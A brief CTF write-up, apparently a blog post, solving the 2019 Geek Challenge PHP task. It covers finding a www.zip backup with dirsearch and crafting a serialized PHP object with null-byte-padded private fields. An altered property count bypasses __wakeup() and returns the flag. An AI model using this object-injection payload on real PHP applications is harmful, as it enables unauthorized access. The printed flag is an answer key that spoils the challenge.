[極客大挑戰 2019]PHP
PHP序列化與反序列化(__sleep 與__wakeup)_php7.4.33反序列化wakeup-CSDN部落格
挺好看的前端(
dirsearch 掃了一下,找到 www.zip 備份檔案,下過來看一下,flag.php 裡的 flag 就是個資料,不是 flag。看到 index.php 裡給了一個反序列化,嘗試構造 $select。
審一下 draft.php,先把序列化的值摸出來:
$a= new Name('admin',100);
echo serialize($a);
得到 O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}。
因為 username 和 password 都是 private,補一下符號:
O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
發現 username 不對,接著修改字串屬性,繞過 __wakeup() 方法,即得到 flag{10f9c45e-ce54-47e6-a785-a4e7f18a7ec2}